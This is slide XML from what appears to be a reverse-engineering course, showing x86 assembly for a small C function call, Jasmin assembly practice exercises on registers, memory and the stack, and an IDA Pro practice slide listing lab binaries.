                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1800">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:rPr>
              <a:t>004010xx mov 	esp, ebp</a:t>
            </a:r>
            <a:endParaRPr sz="1800">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
              <a:latin typeface="Calibri"/>
              <a:ea typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
              <a:sym typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1800">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:rPr>
              <a:t>004010xx pop 	ebp</a:t>
            </a:r>
            <a:endParaRPr sz="1800">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
              <a:latin typeface="Calibri"/>
              <a:ea typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
              <a:sym typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1800">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:rPr>
              <a:t>004010xx ret</a:t>
            </a:r>
            <a:endParaRPr sz="1800">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>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94"/>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Recognizing C/C++ structure</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="947" name="Google Shape;947;p94"/>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Function call</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="948" name="Google Shape;948;p94"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="827584" y="1959223"/>
            <a:ext cx="2962542" cy="3693319"/>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int </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en-GB" sz="1800">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:rPr>
              <a:t>adder</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:rPr>
              <a:t>(int a, int b)</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return a+b;</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void main()</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int x = 1;</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int y = 2;</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en-GB" sz="1800">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:rPr>
              <a:t>printf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:rPr>
              <a:t>("the function returned the number %d\n", adder(x,y));</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a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="949" name="Google Shape;949;p94"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4743946" y="1817905"/>
            <a:ext cx="3755644" cy="1754326"/>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00401730 push 	ebp</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00401731 mov 	ebp, esp</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00401733 mov 	eax, [ebp+</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en-GB" sz="1800">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:rPr>
              <a:t>arg_0</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="18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00401736 add 	eax, [ebp+</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en-GB" sz="1800">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:rPr>
              <a:t>arg_4</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="18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00401739 pop 	ebp</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0040173A retn</a:t>
            </a:r>
            <a:endParaRPr sz="1800">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Calibri"/>
              <a:ea typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
              <a:sym typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="950" name="Google Shape;950;p94"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4743946" y="3645024"/>
            <a:ext cx="3755644" cy="3139321"/>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00401746 mov [</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en-GB" sz="1800">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:rPr>
              <a:t>ebp+var_4</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:rPr>
              <a:t>], 1</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0040174D mov [</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en-GB" sz="1800">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:rPr>
              <a:t>ebp+var_8</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:rPr>
              <a:t>], 2</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00401754 mov eax, [</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en-GB" sz="1800">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:rPr>
              <a:t>ebp+var_8</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="18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00401757 push eax</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00401758 mov ecx, [</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en-GB" sz="1800">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:rPr>
              <a:t>ebp+var_4</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="18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0040175B push ecx</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0040175C call adder</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00401761 add esp, 8</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00401764 push eax</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00401765 push offset TheFunctionRet</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0040176A call ds:printf</a:t>
            </a:r>
            <a:endParaRPr sz="1800">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Calibri"/>
              <a:ea typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
              <a:sym typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="951" name="Google Shape;951;p94"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4009450" y="1774557"/>
            <a:ext cx="73449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adder</a:t>
            </a:r>
            <a:endParaRPr sz="1800">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Calibri"/>
              <a:ea typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
              <a:sym typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="952" name="Google Shape;952;p94"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4089600" y="3812884"/>
            <a:ext cx="6543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main</a:t>
            </a:r>
            <a:endParaRPr sz="1800">
              <a:solidFill>
                <a:schemeClr val="dk1"/>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95"/>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Practice [Assembly by </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en-GB"/>
              <a:t>Jasmin </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>app.]</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="959" name="Google Shape;959;p95"/>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Practice “Simple Instructions”</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="960" name="Google Shape;960;p95"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="0" l="0" r="0" t="0"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="467544" y="1988840"/>
            <a:ext cx="8364264" cy="4539554"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="961" name="Google Shape;961;p95"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1097701" y="3501008"/>
            <a:ext cx="1043491" cy="369332"/>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chemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:rPr>
              <a:t>Registers</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1800">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Calibri"/>
              <a:ea typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
              <a:sym typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="962" name="Google Shape;962;p95"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3419872" y="2996952"/>
            <a:ext cx="668773" cy="369332"/>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chemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:rPr>
              <a:t>Code</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1800">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Calibri"/>
              <a:ea typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
              <a:sym typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="963" name="Google Shape;963;p95"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3754258" y="5085184"/>
            <a:ext cx="625492" cy="369332"/>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chemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:rPr>
              <a:t>Help</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1800">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Calibri"/>
              <a:ea typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
              <a:sym typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="964" name="Google Shape;964;p95"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6444208" y="4437112"/>
            <a:ext cx="1004827" cy="369332"/>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chemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:rPr>
              <a:t>Memory</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1800">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Calibri"/>
              <a:ea typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
              <a:sym typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="965" name="Google Shape;965;p95"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="827584" y="4758436"/>
            <a:ext cx="660758" cy="369332"/>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chemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:rPr>
              <a:t>Flags</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1800">
              <a:solidFill>
                <a:schemeClr val="dk1"/>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96"/>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Practice Jasmin</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="972" name="Google Shape;972;p96"/>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152400" lvl="0" marL="342900" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="3000"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="973" name="Google Shape;973;p96"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="395536" y="1484784"/>
            <a:ext cx="2660728" cy="2308324"/>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u="sng">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:rPr>
              <a:t>Storing results in Memory</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mov eax, 4</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mov ebx, 6</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mov [eax], ebx</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mov ecx, eax</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add ecx, ebx</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mov [eax+4], ecx</a:t>
            </a:r>
            <a:endParaRPr sz="1800">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Calibri"/>
              <a:ea typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
              <a:sym typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="974" name="Google Shape;974;p96"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3563888" y="1484784"/>
            <a:ext cx="1275670" cy="2031325"/>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u="sng">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:rPr>
              <a:t>Using Stack</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mov eax, 4</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mov ebx, 6</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push eax</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push ebx</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pop ecx</a:t>
            </a:r>
            <a:endParaRPr sz="1800">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Calibri"/>
              <a:ea typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
              <a:sym typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="975" name="Google Shape;975;p96"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5940152" y="1484784"/>
            <a:ext cx="2915222" cy="1200329"/>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u="sng">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:rPr>
              <a:t>Reversing a sequence</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Eax, ebx, ecx, edx = 1,2,3, 4</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-&gt; Eax, ebx, ecx, edx = 4,3,2,1</a:t>
            </a:r>
            <a:endParaRPr sz="1800">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Calibri"/>
              <a:ea typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
              <a:sym typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="976" name="Google Shape;976;p96"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1259632" y="4005064"/>
            <a:ext cx="288032" cy="896040"/>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7" name="Google Shape;977;p96"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1129823" y="5169966"/>
            <a:ext cx="54765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EAX</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EBX</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ECX</a:t>
            </a:r>
            <a:endParaRPr sz="1800">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Calibri"/>
              <a:ea typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
              <a:sym typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="978" name="Google Shape;978;p96"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6430001" y="5412007"/>
            <a:ext cx="288032" cy="448020"/>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9" name="Google Shape;979;p96"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4071914" y="5617986"/>
            <a:ext cx="54765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ESP</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EBP</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EIP</a:t>
            </a:r>
            <a:endParaRPr sz="1800">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Calibri"/>
              <a:ea typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
              <a:sym typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="980" name="Google Shape;980;p96"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4201723" y="4987997"/>
            <a:ext cx="288032" cy="448020"/>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1" name="Google Shape;981;p96"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1725900" y="4453084"/>
            <a:ext cx="2920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982" name="Google Shape;982;p96"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4619564" y="5031335"/>
            <a:ext cx="2920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983" name="Google Shape;983;p96"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6701808" y="5487144"/>
            <a:ext cx="2920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97"/>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Practice 5 &amp; 6 [IDA Pro]</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="990" name="Google Shape;990;p97"/>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Introduction to IDA Pro</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-342900" lvl="0" marL="342900" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="3000"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>Examine C structures by IDA Pro</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-285750" lvl="1" marL="742950" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="560"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="2800"/>
              <a:buChar char="–"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>Lab05-01.dll (skip)</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-285750" lvl="1" marL="742950" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="560"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="2800"/>
              <a:buChar char="–"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>Lab06-01.exe</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-285750" lvl="1" marL="742950" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="560"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="2800"/>
              <a:buChar char="–"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>Lab06-02.exe</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-285750" lvl="1" marL="742950" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="560"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="2800"/>
              <a:buChar char="–"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>Lab06-03.exe</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-285750" lvl="1" marL="742950" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="560"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="2800"/>
              <a:buChar char="–"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>Lab06-04.exe</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98"/>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Recognizing Python structure</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="996" name="Google Shape;996;p98"/>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Local &amp; global variables</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-342900" lvl="0" marL="342900" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="3000"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>Operation +, -, ++, --, %</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-342900" lvl="0" marL="342900" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="3000"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>Condition</a:t>
            </a:r>
            <a:r>
              <a:rPr i="1" lang="en-GB"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr i="1" lang="en-GB"/>
              <a:t>if</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-342900" lvl="0" marL="342900" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="3000"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>Loop </a:t>
            </a:r>
            <a:r>
              <a:rPr i="1" lang="en-GB"/>
              <a:t>for</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr i="1" lang="en-GB"/>
              <a:t>while</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-342900" lvl="0" marL="342900" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="3000"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>Function calls</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-342900" lvl="0" marL="342900" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="3000"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>Other: </a:t>
            </a:r>
            <a:r>
              <a:rPr i="1" lang="en-GB"/>
              <a:t>switch</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
